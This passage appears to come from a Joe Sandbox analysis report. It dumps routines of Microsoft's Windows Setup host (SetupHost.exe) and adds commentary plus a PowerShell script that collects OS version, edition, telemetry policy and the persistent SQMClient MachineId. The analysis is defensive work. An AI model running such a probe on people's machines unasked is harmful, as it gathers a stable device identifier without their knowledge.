                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$FreeLoad
                                                                                                                        • String ID: AllowCommercialDataPipeline$AllowTelemetry$ConfigureTelemetryOptInChangeNotification$ConfigureTelemetryOptInSettingsUx$DisableDeviceDelete$DisableDiagnosticDataViewer$DisableTelemetryOptInChangeNotification$DisableTelemetryOptInSettingsUx$LimitEnhancedDiagnosticDataWindowsAnalytics$PolicyManager_FreeGetPolicyData$PolicyManager_GetPolicy$Software\Policies\Microsoft\Windows\DataCollection$System$policymanager.dll
                                                                                                                        • API String ID: 2256533930-3128045802
                                                                                                                        • Opcode ID: 449a41a5cd55d3bda4790e0978baf387e326d3a86b8e1bd4e4d49289e65978ef
                                                                                                                        • Instruction ID: 32ab8332bd23bca79a258435f156417933ac8414707c72a1ec73582ee611e8ce
                                                                                                                        • Opcode Fuzzy Hash: 449a41a5cd55d3bda4790e0978baf387e326d3a86b8e1bd4e4d49289e65978ef
                                                                                                                        • Instruction Fuzzy Hash: 2C51F571D84325EBDB558B14EC58BEE7FA8FF19325F10806AF805A7380DB349D009BA9
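The string sets of the routines above (CMoSetupOneSettingsHelperT::AddQueryStringParameters, CSetupHost::InitializeOneSettings, the "SetupHost:" log lines) identify this dumped module at 004C0000 as Microsoft's Windows Setup host rather than code authored by the submitted sample. Two of the routines are still worth understanding as a host-identity probe: 004FA6C1 gathers the OS version (RtlGetVersion, GetProductInfo) and registry identity values (SQMClient MachineId, EditionId, InstallationType, the Insider Ring) to build OneSettings query parameters, and 0054AAD9 resolves data-collection policy through policymanager.dll, falling back to RegGetValueW on Software\Policies\Microsoft\Windows\DataCollection. Note that the 0x00000800 flag passed to LoadLibraryExW at 0054AB02 is LOAD_LIBRARY_SEARCH_SYSTEM32, so that load is confined to System32 and is not exposed to application-directory DLL search-order hijacking. The PowerShell below is an added example, not code from the report or from SetupHost.exe: it reproduces what the two routines read using only the APIs and registry paths in their API and string lists. The pairing of value names to keys, the HKLM hive for the policy key and the value types are assumptions; the P/Invoke declarations are the standard Win32 signatures.

```powershell
# Added example; not code from the Joe Sandbox report or from SetupHost.exe.
# Reproduces what routine 004FA6C1 gathers (RtlGetVersion, GetProductInfo and the
# registry values named in its string set) and the DataCollection policy values
# routine 0054AAD9 falls back to reading with RegGetValueW when the
# policymanager.dll exports are unavailable. Run elevated: SYSTEM\Setup\MoSetup
# is not necessarily readable by a standard user.

if (-not ('SetupHostProbe' -as [type])) {
    Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;

public static class SetupHostProbe
{
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct OSVERSIONINFOEXW
    {
        public uint dwOSVersionInfoSize;
        public uint dwMajorVersion;
        public uint dwMinorVersion;
        public uint dwBuildNumber;
        public uint dwPlatformId;
        [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)]
        public string szCSDVersion;
        public ushort wServicePackMajor;
        public ushort wServicePackMinor;
        public ushort wSuiteMask;
        public byte wProductType;
        public byte wReserved;
    }

    // ntdll!RtlGetVersion reports the real kernel version regardless of the
    // caller's compatibility manifest, unlike kernel32!GetVersionExW.
    [DllImport("ntdll.dll")]
    public static extern int RtlGetVersion(ref OSVERSIONINFOEXW info);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool GetProductInfo(
        uint major, uint minor, uint spMajor, uint spMinor, out uint productType);
}
'@
}

function Get-SetupHostIdentityProbe {
    $ver = [SetupHostProbe+OSVERSIONINFOEXW]::new()
    $ver.dwOSVersionInfoSize = [Runtime.InteropServices.Marshal]::SizeOf($ver)
    [void][SetupHostProbe]::RtlGetVersion([ref]$ver)

    $productType = [uint32]0
    [void][SetupHostProbe]::GetProductInfo($ver.dwMajorVersion, $ver.dwMinorVersion,
        $ver.wServicePackMajor, $ver.wServicePackMinor, [ref]$productType)

    # Which value name lives under which key is an assumption taken from the two
    # routines' string lists (the report shows the names, not the pairing), and
    # HKLM is assumed for the policy key; a missing value is reported as $null.
    $lookups = [ordered]@{
        'HKLM:\SOFTWARE\Microsoft\SQMClient'                       = @('MachineId')
        'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'       = @('EditionId', 'InstallationType')
        'HKLM:\SOFTWARE\Microsoft\WindowsSelfHost\Applicability'   = @('Ring')
        'HKLM:\SYSTEM\Setup\MoSetup'                               = @('OneSettingsBranch', 'OneSettingsVersion')
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection' = @(
            'AllowTelemetry', 'AllowCommercialDataPipeline',
            'LimitEnhancedDiagnosticDataWindowsAnalytics',
            'DisableTelemetryOptInSettingsUx', 'DisableDiagnosticDataViewer')
    }

    $result = [ordered]@{
        osver       = '{0}.{1}.{2}' -f $ver.dwMajorVersion, $ver.dwMinorVersion, $ver.dwBuildNumber
        productType = '0x{0:X8}' -f $productType   # PRODUCT_* constant, e.g. 0x00000030 = Professional
    }
    foreach ($key in $lookups.Keys) {
        foreach ($name in $lookups[$key]) {
            $item = Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue
            $result[$name] = if ($null -ne $item) { $item.$name } else { $null }
        }
    }
    [pscustomobject]$result
}

Get-SetupHostIdentityProbe | Format-List
```

On a domain-joined or MDM-enrolled host the DataCollection values are what group policy or the MDM channel wrote; on an unmanaged host most of them are absent and the script reports $null, which matches the fallback branch of 0054AAD9 finding nothing to compare. The MachineId under SQMClient is a stable per-install GUID and is the one value here that serves as a persistent device identifier.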

Control-flow Graph

Control-flow graph of the routine at 004E75C4 (rendered as an image in the original report; the graph serialization is omitted here). Basic blocks span 004E75C4 to 004E7AC7. Blocks that call imported APIs: 004E784A (DefWindowProcW), 004E7929 (ShutdownBlockReasonDestroy), 004E7974 and 004E7A31 (GetLastError), 004E79E4 (ShutdownBlockReasonCreate) and 004E7AB9 (PostQuitMessage).
                                                                                                                        APIs
                                                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,00000000,00000000,?,004E66B4,?,?,?), ref: 004E7854
                                                                                                                        • ShutdownBlockReasonDestroy.USER32(?,?,?,?,00000000,00000000,?,004E66B4,?,?,?), ref: 004E792C
                                                                                                                        • ShutdownBlockReasonCreate.USER32(?,?), ref: 004E79EA
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,004E66B4,?,?,?), ref: 004E7A31
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,004E66B4,?,?,?), ref: 004E7974
                                                                                                                          • Part of subcall function 004F8A19: __EH_prolog3.LIBCMT ref: 004F8A20
                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 004E7ABB
                                                                                                                        Strings
                                                                                                                        • SYSTEM\Setup\MoSetup\Volatile, xrefs: 004E76E7
                                                                                                                        • FALSE, xrefs: 004E7753, 004E775B
                                                                                                                        • SetupUI: Logging EndSession [0x%X] notification..., xrefs: 004E770D
                                                                                                                        • SetupUI: Got a message for session state change, xrefs: 004E762A
                                                                                                                        • SetupUI: Calling ShutdownBlockReasonDestroy..., xrefs: 004E790B
                                                                                                                        • SetupUI: Calling registered callback..., xrefs: 004E7666, 004E78B3
                                                                                                                        • SetupUI: Got a message from Store, xrefs: 004E7876
                                                                                                                        • TRUE, xrefs: 004E774C
                                                                                                                        • SetupUI: Button click detected - no registered callback., xrefs: 004E7802
                                                                                                                        • SetupUI: Posting Quit Message..., xrefs: 004E7A9B
                                                                                                                        • SetupUI: ShutdownBlockReasonCreate failed! Error: 0x%X, xrefs: 004E7A5E
                                                                                                                        • SetupUI: Button click detected - calling registered callback..., xrefs: 004E77BB
                                                                                                                        • SetupUI: ShutdownBlockReasonCreate succeeded!, xrefs: 004E7A0B
                                                                                                                        • SetupUI: ShutdownBlockReasonDestroy failed! Error: 0x%X, xrefs: 004E79A5
                                                                                                                        • SetupUI: Returning %s to QueryEndSession [0x%X] request..., xrefs: 004E775E
                                                                                                                        • SetupUI: Calling ShutdownBlockReasonCreate..., xrefs: 004E79C6
                                                                                                                        • SetupUI: ShutdownBlockReasonDestroy succeeded!, xrefs: 004E794D
                                                                                                                        • SetupUI: No registered callback., xrefs: 004E76A2, 004E78CF
                                                                                                                        • SetupUI: Got a timer message, xrefs: 004E76C5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BlockErrorLastReasonShutdown$CreateDestroyH_prolog3MessagePostProcQuitWindow
                                                                                                                        • String ID: FALSE$SYSTEM\Setup\MoSetup\Volatile$SetupUI: Button click detected - calling registered callback...$SetupUI: Button click detected - no registered callback.$SetupUI: Calling ShutdownBlockReasonCreate...$SetupUI: Calling ShutdownBlockReasonDestroy...$SetupUI: Calling registered callback...$SetupUI: Got a message for session state change$SetupUI: Got a message from Store$SetupUI: Got a timer message$SetupUI: Logging EndSession [0x%X] notification...$SetupUI: No registered callback.$SetupUI: Posting Quit Message...$SetupUI: Returning %s to QueryEndSession [0x%X] request...$SetupUI: ShutdownBlockReasonCreate failed! Error: 0x%X$SetupUI: ShutdownBlockReasonCreate succeeded!$SetupUI: ShutdownBlockReasonDestroy failed! Error: 0x%X$SetupUI: ShutdownBlockReasonDestroy succeeded!$TRUE
                                                                                                                        • API String ID: 2660305463-3359713709
                                                                                                                        • Opcode ID: 58344904730569409c8a8d99f3f8e518fd443dbbd92be42b863f53ae4a228c0e
                                                                                                                        • Instruction ID: e27fd99320f46b857d0d89b4693f28d7be2e14ee3e9772b05f415fb68afaeab6
                                                                                                                        • Opcode Fuzzy Hash: 58344904730569409c8a8d99f3f8e518fd443dbbd92be42b863f53ae4a228c0e
                                                                                                                        • Instruction Fuzzy Hash: 4AE1D6B4B046159BCF046B669C6CA3EBB55FF48322B08805BEC0597391DF38ED02DE99

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                         control_flow_graph 966 4ec756-4ec7fb call 54f3e6 call 53da8f memset call 4fe9f7 call 4f8af9 975 4ec83f-4ec85e call 4ff51a call 4f8af9 966->975 976 4ec7fd-4ec817 GetLastError call 4f9d6c 966->976 984 4ec87b-4ec887 975->984 985 4ec860-4ec879 975->985 981 4ec81a-4ec82b 976->981 990 4ec831-4ec83a call 4f8ab5 981->990 994 4ec889-4ec8a8 call 4f8a19 984->994 995 4ec8b0-4ec8c3 call 53de32 984->995 985->990 998 4ecb1d-4ecb2a call 4f9d9c 990->998 1013 4ec8ad 994->1013 1003 4ec8d4-4ec8e8 call 53d721 995->1003 1004 4ec8c5-4ec8cf 995->1004 1005 4ecb2c-4ecb33 call 4f9b21 998->1005 1006 4ecb3a-4ecb5f call 4eee5d * 2 call 54f3a4 998->1006 1015 4ec92f-4ec93b 1003->1015 1016 4ec8ea-4ec8f6 1003->1016 1004->981 1005->1006 1013->995 1026 4ec95e-4ec971 1015->1026 1027 4ec93d-4ec95b call 4f8a19 1015->1027 1016->1026 1028 4ec8f8-4ec904 1016->1028 1038 4ec9ce-4ec9e1 1026->1038 1039 4ec973-4ec97c 1026->1039 1027->1026 1029 4ec90b-4ec925 call 4f8a19 1028->1029 1030 4ec906 1028->1030 1044 4ec92a-4ec92d 1029->1044 1030->1029 1054 4eca0e-4eca21 1038->1054 1055 4ec9e3-4eca06 GetSystemDefaultUILanguage call 4f8a19 1038->1055 1042 4ec97e-4ec983 1039->1042 1043 4ec985-4ec988 1039->1043 1046 4ec9ac-4ec9c6 call 4f8a19 1042->1046 1047 4ec98a-4ec98f 1043->1047 1048 4ec991-4ec994 1043->1048 1044->1026 1060 4ec9cb 1046->1060 1047->1046 1049 4ec99d-4ec9a5 1048->1049 1050 4ec996-4ec99b 1048->1050 1049->1046 1053 4ec9a7 1049->1053 1050->1046 1053->1046 1064 4eca4e-4eca61 1054->1064 1065 4eca23-4eca46 GetUserDefaultUILanguage call 4f8a19 1054->1065 1066 4eca0b 1055->1066 1060->1038 1071 4eca8b-4eca9e 1064->1071 1072 4eca63-4eca83 call 4f8a19 1064->1072 1074 4eca4b 1065->1074 1066->1054 1080 4ecad3-4ecaf2 call 4fb583 1071->1080 1081 4ecaa0-4ecacb call 4f8a19 1071->1081 1083 4eca88 1072->1083 1074->1064 1086 4ecaf4-4ecb0c call 4f8ab5 1080->1086 1087 4ecb60-4ecb6c 1080->1087 1092 4ecad0 1081->1092 1083->1071 1096 4ecb11 1086->1096 1095 4ecb6e-4ecb8e call 4f8a19 1087->1095 1087->1096 1092->1080 1102 4ecb93-4ecb96 1095->1102 1098 4ecb17 1096->1098 1098->998 1102->1098
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 004EC760
                                                                                                                        • memset.MSVCRT ref: 004EC7CC
                                                                                                                          • Part of subcall function 004FE9F7: memset.MSVCRT ref: 004FEA20
                                                                                                                          • Part of subcall function 004FE9F7: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 004FEA37
                                                                                                                          • Part of subcall function 004FE9F7: GetLastError.KERNEL32(?,00000000), ref: 004FEA52
                                                                                                                          • Part of subcall function 004FE9F7: SetLastError.KERNEL32(00000000,?,00000000), ref: 004FEA62
                                                                                                                          • Part of subcall function 004F8AF9: GetProcessHeap.KERNEL32(00000000,?,?,?,004FB826,?,?,?,00000000), ref: 004F8B0A
                                                                                                                          • Part of subcall function 004F8AF9: HeapFree.KERNEL32(00000000,?,004FB826,?,?,?,00000000), ref: 004F8B11
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004EC7FD
                                                                                                                        • GetSystemDefaultUILanguage.KERNEL32(?,?,00000000,00000000), ref: 004EC9E3
                                                                                                                        • GetUserDefaultUILanguage.KERNEL32(?,?,00000000,00000000), ref: 004ECA23
                                                                                                                          • Part of subcall function 004F8A19: __EH_prolog3.LIBCMT ref: 004F8A20
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$DefaultHeapLanguagememset$FileFreeH_prolog3H_prolog3_ModuleNameProcessSystemUser
                                                                                                                        • String ID: Host OS Architecture [ %s ]$ Host OS Build String [ %s ]$ Host OS Edition [ %s ]$ Host OS Language Id [ %d ]$ Host OS License State [ %s ]$ Host OS License State [ UNAVAILABLE ]$ Host OS Version [ %d.%d.%d ]$ User UI Language Id [ %d ]$CSetupHost::LogBuildInfo$Genuine$Not-Genuine$SetupHost: Setup build version is: %s$Unknown$arm$arm64$x64$x86
                                                                                                                        • API String ID: 1568751597-578167857
                                                                                                                        • Opcode ID: df5142e232880ae952fdbeb622de6924d732e93a4f46b397d0708c048c4b0a00
                                                                                                                        • Instruction ID: b3d769b21cbee8fbacc67794ef1d56f6f61b17e7f6007f7073f92404e78ba132
                                                                                                                        • Opcode Fuzzy Hash: df5142e232880ae952fdbeb622de6924d732e93a4f46b397d0708c048c4b0a00
                                                                                                                        • Instruction Fuzzy Hash: 8FC1B974B006288BCF54AB259C99B2D77A1FF44311F04859FE8469B391CF389D05CF99

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                         control_flow_graph 1103 53d77d-53d7b2 call 54f3b3 1106 53d7c5-53d7d9 LoadLibraryExW 1103->1106 1107 53d7b4 1103->1107 1109 53d7db-53d7ea GetLastError call 4f9d6c 1106->1109 1110 53d7ec-53d7fc GetProcAddress 1106->1110 1108 53d7b9-53d7c0 call 4f9d84 1107->1108 1121 53d9a8-53d9ac 1108->1121 1109->1108 1111 53d812-53d823 GetProcAddress 1110->1111 1112 53d7fe-53d80d GetLastError call 4f9d6c 1110->1112 1111->1112 1117 53d825-53d836 GetProcAddress 1111->1117 1122 53d99e-53d9a0 call 4f9d84 1112->1122 1117->1112 1120 53d838-53d849 GetProcAddress 1117->1120 1120->1112 1125 53d84b-53d85c GetProcAddress 1120->1125 1123 53d9bb-53d9c6 call 4f9d9c 1121->1123 1124 53d9ae-53d9b9 1121->1124 1129 53d9a5 1122->1129 1133 53d9d5-53d9d9 1123->1133 1134 53d9c8-53d9d1 LocalFree 1123->1134 1124->1123 1125->1112 1127 53d85e-53d870 1125->1127 1127->1122 1142 53d876-53d89b 1127->1142 1129->1121 1135 53d9db-53d9e4 LocalFree 1133->1135 1136 53d9e8-53d9ec 1133->1136 1134->1133 1135->1136 1137 53d9fb-53da01 1136->1137 1138 53d9ee-53d9f7 LocalFree 1136->1138 1140 53da03-53da04 FreeLibrary 1137->1140 1141 53da0a-53da15 call 54f390 1137->1141 1138->1137 1140->1141 1142->1122 1147 53d8a1-53d8a9 1142->1147 1148 53d999 1147->1148 1149 53d8af-53d8b1 1147->1149 1148->1122 1150 53d8b4-53d8bd 1149->1150 1151 53d8bf-53d8c8 LocalFree 1150->1151 1152 53d8cc-53d8f3 1150->1152 1151->1152 1155 53d8f5-53d8f9 1152->1155 1156 53d928-53d92c 1152->1156 1159 53d981 1155->1159 1160 53d8ff 1155->1160 1157 53d93b-53d956 1156->1157 1158 53d92e-53d937 LocalFree 1156->1158 1169 53d958-53d95d 1157->1169 1158->1157 1161 53d983 call 4f9d84 1159->1161 1162 53d902-53d915 1160->1162 1168 53d988-53d98b 1161->1168 1162->1150 1165 53d917-53d919 1162->1165 1166 53d996 1165->1166 1167 53d91b-53d926 1165->1167 1166->1148 1167->1168 1168->1129 1169->1160 1170 53d95f-53d963 1169->1170 1170->1159 1171 53d965-53d969 1170->1171 1171->1160 1172 53d96b-53d96f 1171->1172 1173 53d971-53d97f 1172->1173 1174 53d98d-53d994 1172->1174 1173->1162 1174->1161
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0053D784
                                                                                                                        • LoadLibraryExW.KERNEL32(SLC.DLL,00000000,00000000,0000006C,0053D74D,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0053D7CC
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 0053D7DB
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SLOpen), ref: 0053D7F2
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 0053D7FE
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SLClose), ref: 0053D818
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SLGetLicensingStatusInformation), ref: 0053D82B
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SLGetProductSkuInformation), ref: 0053D83E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SLGetSLIDList), ref: 0053D851
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0053D8C2
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0053D9CB
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0053D9DE
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0053D9F1
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0053DA04
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeProc$Local$ErrorLastLibrary$H_prolog3Load
                                                                                                                        • String ID: DependsOn$SLC.DLL$SLClose$SLGetLicensingStatusInformation$SLGetProductSkuInformation$SLGetSLIDList$SLOpen
                                                                                                                        • API String ID: 2218164828-1438759880
                                                                                                                        • Opcode ID: af2645b29fcee31d170fb747118660c09301219b8b631189c25079fb180498b0
                                                                                                                        • Instruction ID: d56315954d0bb1f6a0ce20747873d21c1f8cc077785b1356fa2c1821c01cf519
                                                                                                                        • Opcode Fuzzy Hash: af2645b29fcee31d170fb747118660c09301219b8b631189c25079fb180498b0
                                                                                                                        • Instruction Fuzzy Hash: F3814B31E0030A9BDF119FA5EC59BAEBBB5BF48316F20442AE501B7290CB749D45DF64

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1175 4e7be5-4e7c13 call 54f3b3 call 4f9c14 1180 4e7c15-4e7c1c 1175->1180 1181 4e7c41-4e7c5c LoadImageW 1175->1181 1182 4e7c1f-4e7c3c call 4f8ab5 1180->1182 1183 4e7c5e-4e7c78 GetLastError call 4f9d6c 1181->1183 1184 4e7c7a-4e7cc2 LoadCursorW RegisterClassW 1181->1184 1204 4e7d12-4e7d14 1182->1204 1183->1182 1186 4e7d37-4e7d4a 1184->1186 1187 4e7cc4-4e7ccf GetLastError 1184->1187 1199 4e7d4c-4e7d6a call 4f8a19 1186->1199 1200 4e7d6d-4e7d8d CreateWindowExW 1186->1200 1187->1186 1190 4e7cd1-4e7ce3 GetLastError call 4f9d53 1187->1190 1190->1186 1195 4e7ce5-4e7d0a call 4f8ab5 1190->1195 1225 4e7d0f 1195->1225 1199->1200 1201 4e7d8f-4e7d9c GetLastError call 4f9d6c 1200->1201 1202 4e7da6-4e7db8 ChangeWindowMessageFilterEx 1200->1202 1201->1202 1206 4e7dba-4e7dc7 GetLastError call 4f9d6c 1202->1206 1207 4e7dd1-4e7de6 SetTimer 1202->1207 1208 4e7d1d-4e7d26 call 4f9d9c 1204->1208 1209 4e7d16-4e7d18 call 4e7e94 1204->1209 1206->1207 1214 4e7dff-4e7e0e call 4f8822 1207->1214 1215 4e7de8-4e7df5 GetLastError call 4f9d6c 1207->1215 1228 4e7d2f-4e7d36 call 54f390 1208->1228 1229 4e7d28-4e7d2a call 4f9b21 1208->1229 1209->1208 1230 4e7e1a-4e7e2c UpdateWindow 1214->1230 1231 4e7e10 1214->1231 1215->1214 1225->1204 1229->1228 1236 4e7e2e-4e7e3b GetLastError call 4f9d6c 1230->1236 1237 4e7e45-4e7e67 ShowWindow SetWindowLongW GetWindowLongW 1230->1237 1231->1230 1236->1237 1237->1225 1239 4e7e6d-4e7e88 1237->1239
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E7BEC
                                                                                                                        • LoadImageW.USER32(00000040,?,00000001,00000000,00000000,00000040), ref: 004E7C4F
                                                                                                                        • GetLastError.KERNEL32 ref: 004E7C5E
                                                                                                                        • LoadCursorW.USER32 ref: 004E7CA2
                                                                                                                        • RegisterClassW.USER32(00000003), ref: 004E7CB9
                                                                                                                        • GetLastError.KERNEL32 ref: 004E7CC4
                                                                                                                        • GetLastError.KERNEL32 ref: 004E7CD1
                                                                                                                        • CreateWindowExW.USER32(00000000,?,?,80000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 004E7D83
                                                                                                                        • GetLastError.KERNEL32 ref: 004E7D8F
                                                                                                                        • ChangeWindowMessageFilterEx.USER32(00000000,00009234,00000001,00000000), ref: 004E7DB0
                                                                                                                        • GetLastError.KERNEL32 ref: 004E7DBA
                                                                                                                        • SetTimer.USER32(00000000,00001230,00001388,00000000), ref: 004E7DDE
                                                                                                                        • GetLastError.KERNEL32 ref: 004E7DE8
                                                                                                                        • UpdateWindow.USER32(00000000), ref: 004E7E24
                                                                                                                        • GetLastError.KERNEL32 ref: 004E7E2E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Window$Load$ChangeClassCreateCursorFilterH_prolog3ImageMessageRegisterTimerUpdate
                                                                                                                        • String ID: CSystemHelper::CreateMainWindow$SYSTEM\Setup\MoSetup\Volatile$SetupUI: Creating main window...${6c104913-738b-4411-a4ec-8b594e314f6b}
                                                                                                                        • API String ID: 1906055104-1803576973
                                                                                                                        • Opcode ID: ddb90c23b2d86cd4cc19ff97dbda228671dfab4059ec6694613c276c454f5b15
                                                                                                                        • Instruction ID: 503240e1bbb0af85f5cd9640d24a55b16e56fb690590912e00aa2bae5c3799f7
                                                                                                                        • Opcode Fuzzy Hash: ddb90c23b2d86cd4cc19ff97dbda228671dfab4059ec6694613c276c454f5b15
                                                                                                                        • Instruction Fuzzy Hash: EB71F770B043049BDF04AFB59C59F7E77B6AF98322F20441AF902EB391DB7898019B59

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                         control_flow_graph 1243 54d5fc-54d639 call 54f3e6 1246 54d645-54d680 memset RtlGetVersion call 4f9ca1 1243->1246 1247 54d63b-54d640 1243->1247 1253 54d682-54d688 1246->1253 1254 54d68d-54d694 1246->1254 1248 54d88f-54d891 call 4f9d84 1247->1248 1252 54d896-54d8a9 call 4f9d9c 1248->1252 1264 54d8b2-54d8bb 1252->1264 1265 54d8ab-54d8ad call 4f9b21 1252->1265 1253->1248 1256 54d7e1-54d7e8 1254->1256 1257 54d69a-54d6ac call 4fb1d4 1254->1257 1260 54d7ee-54d7f5 1256->1260 1261 54d88a 1256->1261 1266 54d6b1-54d6b5 1257->1266 1262 54d844-54d84b 1260->1262 1263 54d7f7-54d7fb 1260->1263 1261->1248 1262->1261 1274 54d84d-54d85a 1262->1274 1267 54d6f1 1263->1267 1268 54d801-54d80b 1263->1268 1272 54d8c4-54d8cd 1264->1272 1273 54d8bd-54d8bf call 4f9b21 1264->1273 1265->1264 1270 54d6b7-54d6c4 call 4f9d84 1266->1270 1271 54d6c9-54d6eb CompareStringW 1266->1271 1282 54d6f7 1267->1282 1275 54d817-54d81b 1268->1275 1276 54d80d-54d812 1268->1276 1270->1252 1271->1267 1279 54d77c-54d795 CompareStringW 1271->1279 1280 54d8d6-54d8e5 1272->1280 1281 54d8cf-54d8d1 call 4f9b21 1272->1281 1273->1272 1274->1282 1283 54d860-54d865 1274->1283 1285 54d827-54d82e 1275->1285 1286 54d81d-54d822 1275->1286 1284 54d6fc-54d705 call 4f9c14 1276->1284 1288 54d7a7-54d7c0 CompareStringW 1279->1288 1289 54d797-54d7a2 1279->1289 1291 54d8e7 call 4f9b21 1280->1291 1292 54d8ec-54d8f7 call 54f3a4 1280->1292 1281->1280 1282->1284 1283->1284 1284->1248 1301 54d70b-54d711 call 54d460 1284->1301 1294 54d830-54d835 1285->1294 1295 54d83a-54d83f 1285->1295 1286->1284 1296 54d7d2-54d7dc 1288->1296 1297 54d7c2-54d7cd 1288->1297 1289->1284 1291->1292 1294->1284 1295->1284 1296->1301 1297->1284 1304 54d716-54d71a 1301->1304 1304->1248 1305 54d720-54d740 CompareStringW 1304->1305 1306 54d746-54d764 call 4e1bc9 1305->1306 1307 